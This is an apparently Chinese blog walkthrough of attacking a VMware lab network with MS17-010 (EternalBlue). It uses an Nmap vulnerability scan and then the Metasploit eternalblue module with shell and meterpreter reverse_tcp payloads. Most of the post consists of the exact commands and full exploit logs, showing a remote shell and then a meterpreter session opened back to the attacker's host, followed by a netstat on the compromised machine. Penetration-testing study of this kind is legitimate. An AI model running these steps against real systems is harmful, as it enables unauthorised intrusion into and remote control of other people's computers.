0
点赞
收藏
分享

微信扫一扫

Metasploit与Nmap组合拳对内网进行Ms17-010(永恒之蓝)攻击

心存浪漫 2022-05-04 阅读 73
安全网络microsoft渗透测试红队攻击

使用Nmap扫描ms17-010

使用Nmap探测内网192.168.119.1C段下那些主机开放了445端口已经存在ms17-010漏洞

由于我的内网IP192.168.119.136,所以就用这条命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:1A:4E (VMware)

Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:EF:68:01 (VMware)

Nmap scan report for 192.168.119.136
Host is up (0.000033s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds

从上图可以看出,在内网中192.168.119.139这台主机存在ms-17-010漏洞!

exploit利用ms17-010

直接上命令:

1
2

use exploit/windows/smb/ms17_010_eternalblue

设置好目标IP,然后run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.119.136:4444 
[+] 192.168.119.139:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.119.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

利用永恒之蓝成功!但返回的只是一个cmdshell

因为msf默认用的paylaod是:payload/windows/x64/shell/reverse_tcp

我们可以设置成其他payload:

1

set payload windows/x64/meterpreter/reverse_tcp

设置好了show options看需要设置的参数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.119.139  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.119.136  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

一般来说只要设置rhostsrport就OK了,其他的msf会自动帮你设置!

最后exploit运行看看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.119.136:4444 
[+] 192.168.119.139:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.119.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.119.139
[*] Meterpreter session 5 opened (192.168.119.136:4444 -> 192.168.119.139:49211) at 2019-10-10 21:24:40 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

可以看到,这个时候就反弹的就是一个meterpreter会话,具体有哪些功能呵呵,你懂得~

使用正向的payload也是可以的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

meterpreter > netstat -ano

Connection list
===============

    Proto  Local address                    Remote address         State        User  Inode  PID/Program name
    -----  -------------                    --------------         -----        ----  -----  ----------------
    tcp    0.0.0.0:135                      0.0.0.0:*              LISTEN       0     0      712/svchost.exe
    tcp    0.0.0.0:445                      0.0.0.0:*              LISTEN       0     0      4/System
    tcp    0.0.0.0:5357                     0.0.0.0:*              LISTEN       0     0      4/System
    tcp    0.0.0.0:49152                    0.0.0.0:*              LISTEN       0     0      396/wininit.exe
    tcp    0.0.0.0:49153                    0.0.0.0:*              LISTEN       0     0      764/svchost.exe
    tcp    0.0.0.0:49154                    0.0.0.0:*              LISTEN       0     0      928/svchost.exe
    tcp    0.0.0.0:49155                    0.0.0.0:*              LISTEN       0     0      496/services.exe
    tcp    0.0.0.0:49156                    0.0.0.0:*              LISTEN       0     0      2028/svchost.exe
    tcp    0.0.0.0:49157                    0.0.0.0:*              LISTEN       0     0      504/lsass.exe
    tcp    192.168.119.139:139              0.0.0.0:*              LISTEN       0     0      4/System
    tcp    192.168.119.139:4444             192.168.119.136:45747  ESTABLISHED  0     0      1248/spoolsv.exe
    tcp    192.168.119.139:49159            192.168.119.136:4444   ESTABLISHED  0     0      1248/spoolsv.exe
    tcp    192.168.119.139:49187            118.112.253.1:80       ESTABLISHED  0     0      928/svchost.exe
    tcp    192.168.119.139:49188            63.147.242.144:80      ESTABLISHED  0     0      928/svchost.exe
    tcp    192.168.119.139:49189            51.143.111.81:80       SYN_SENT     0     0      648/wermgr.exe
    tcp6   :::135                           :::*                   LISTEN       0     0      712/svchost.exe
    tcp6   :::445                           :::*                   LISTEN       0     0      4/System
    tcp6   :::5357                          :::*                   LISTEN       0     0      4/System
    tcp6   :::49152                         :::*                   LISTEN       0     0      396/wininit.exe
    tcp6   :::49153                         :::*                   LISTEN       0     0      764/svchost.exe
    tcp6   :::49154                         :::*                   LISTEN       0     0      928/svchost.exe
    tcp6   :::49155                         :::*                   LISTEN       0     0      496/services.exe
    tcp6   :::49156                         :::*                   LISTEN       0     0      2028/svchost.exe
    tcp6   :::49157                         :::*                   LISTEN       0     0      504/lsass.exe
    udp    0.0.0.0:500                      0.0.0.0:*                           0     0      928/svchost.exe
    udp    0.0.0.0:3702                     0.0.0.0:*                           0     0      1576/svchost.exe
    udp    0.0.0.0:3702                     0.0.0.0:*                           0     0      1576/svchost.exe
    udp    0.0.0.0:4500                     0.0.0.0:*                           0     0      928/svchost.exe
    udp    0.0.0.0:5355                     0.0.0.0:*                           0     0      984/svchost.exe
    udp    0.0.0.0:61604                    0.0.0.0:*                           0     0      1576/svchost.exe
    udp    127.0.0.1:1900                   0.0.0.0:*                           0     0      1576/svchost.exe
    udp    127.0.0.1:65412                  0.0.0.0:*                           0     0      1576/svchost.exe
    udp    192.168.119.139:137              0.0.0.0:*                           0     0      4/System
    udp    192.168.119.139:138              0.0.0.0:*                           0     0      4/System
    udp    192.168.119.139:1900             0.0.0.0:*                           0     0      1576/svchost.exe
    udp    192.168.119.139:65411            0.0.0.0:*                           0     0      1576/svchost.exe
    udp6   :::500                           :::*                                0     0      928/svchost.exe
    udp6   :::3702                          :::*                                0     0      1576/svchost.exe
    udp6   :::3702                          :::*                                0     0      1576/svchost.exe
    udp6   :::4500                          :::*                                0     0      928/svchost.exe
    udp6   :::5355                          :::*                                0     0      984/svchost.exe
    udp6   :::61605                         :::*                                0     0      1576/svchost.exe
    udp6   ::1:1900                         :::*                                0     0      1576/svchost.exe
    udp6   ::1:65410                        :::*                                0     0      1576/svchost.exe
    udp6   fe80::f50f:3929:7979:5c54:1900   :::*                                0     0      1576/svchost.exe
    udp6   fe80::f50f:3929:7979:5c54:65409  :::*                                0     0      1576/svchost.exe

meterpreter >

查看端口监听情况可以看到:

192.168.119.139:4444192.168.119.136:45747进行连接,注入进程是:spoolsv.exe

交流群:

 微信公众号:

 知识星球:

举报

相关推荐

永恒之蓝MS17-010漏洞复现

漏洞利用命令行MSF永恒之蓝安全技术网络/安全

MS17-010 永恒之蓝漏洞利用方式

安全linux运维

关于永恒之蓝 MS17-010 漏洞利用

windows系统安全安全

MS17-010(永恒之蓝)漏洞复现(超简单,超好学)

安全web安全系统安全安全性测试

复现永恒之蓝[MS17_010]

big data

MSF复现 ms17_010(永恒之蓝)

安全linuxweb安全

【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)

系统安全windows

MS17-010 EternalBlue 漏洞分析

安全

网安实训(九)| 利用Metasploit工具和Ms17-010漏洞进行控制权限获取

系统安全安全网络安全安全漏洞

【网络安全】永恒之蓝实战 - Mac通过Metasploit攻击Server2008

web安全macos网络
0 条评论